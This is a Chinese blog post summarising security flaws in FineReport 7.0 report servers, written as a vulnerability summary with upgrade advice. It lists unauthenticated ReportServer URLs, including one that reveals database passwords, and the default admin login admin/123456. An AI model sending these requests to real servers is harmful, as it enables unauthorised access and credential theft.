帆软报表漏洞总结

一、漏洞背景

FineReport报表软件是帆软软件(中国)公司自主研发的一款纯Java编写的企业级web报表软件。主要针对2012年7.0版本存在一些安全漏洞问题。

二、版本查看

  • 弱口令漏洞提供了访问此页面方法
    在这里插入图片描述

三、漏洞总结

1.未授权访问漏洞

http://ip/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false //未授权访问内网ip的日志
http://ip/ReportServer?op=fr_server&cmd=sc_version_info&showtoolbar=false //未授权访问重置授权
http://ip/ReportServer?op=fr_server&cmd=sc_getconnectioninfo //未授权查看数据库密码

在这里插入图片描述在这里插入图片描述2.默认弱口令

  • 访问https://ip/ReportServer,点击服务器管理平台进入后台页面
    在这里插入图片描述
  • 默认密码为弱口令admin/123456
    在这里插入图片描述

四、漏洞修复

更新帆软报表的版本

  • 目前仅为本人自己遇见的一些情况,后续若遇到新的poc或者exp会进行及时更新,恳请大佬师傅们提成建议!
仅供学习参考使用!!若厂商有使用此版本,自行查验,及时联系官方进行更新!!
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
帆软报表是一款企业级报表设计、生成和发布软件。它提供了丰富的数据展现和统计分析功能,广泛应用于各个行业的数据报表处理中。 而帆软报表channel反序列化漏洞是指在使用帆软报表软件时,由于未对用户输入的渠道配置信息进行正确的反序列化验证,导致恶意攻击者可以构造恶意渠道配置数据,以此来获取或篡改系统中的敏感信息,或者执行一些危害系统安全的操作。 该漏洞的原因主要是由于帆软报表软件在处理渠道配置信息时,没有对用户输入的数据进行充分的验证和过滤。攻击者可以通过构造恶意的渠道配置文件,包含恶意代码或者可以触发一些未被预料到的漏洞行为,从而获取系统权限或者进行其他恶意操作。 要解决这个漏洞问题,首先需要帆软报表软件方面加强对用户输入的渠道配置信息的验证和过滤。包括对输入数据进行严格的反序列化限制,验证渠道配置文件的合法性和完整性,确保渠道配置文件中不存在恶意代码或者其他危险操作。 同时,用户在使用帆软报表软件时也应当注意保持软件及时更新,避免使用非官方渠道配置文件,以及加强系统的安全管理,限制不必要的系统权限,提高系统的安全性。 总之,帆软报表channel反序列化漏洞是一种安全风险,需要软件提供商和用户共同努力来进行修复和加强防护措施,以保障系统数据的安全性和完整性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值